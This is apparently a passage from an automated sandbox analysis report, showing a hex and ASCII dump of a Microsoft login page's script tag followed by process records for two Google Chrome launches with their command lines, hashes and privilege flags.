2f 73 68 61 72 65 64 2f 35 2f 6a 73 2f 6c 6f 67 69 6e 5f 65 6e 5f 57 46 41 4f 70 7a 36 79 53 6f 47 79 51 43 33 56 64 51 77 72 4d 51 32 2e Data Ascii: ent.write(c+S+u)):t.g_sSRSSuccess+=e+"\|"+i+",")}}]));var g_dtFirstByte=new Date();var g_objPageMode = null;</script></head><body><div id="root" /><script type="text/javascript" src="https://logincdn.msauth.net/shared/5/js/login_en_WFAOpz6ySoGyQC3VdQwrMQ2.

Target ID:	0
Start time:	14:05:44
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	14:05:47
Start date:	15/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1916 --field-trial-handle=2008,i,7632152184494238359,10947971405357003457,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false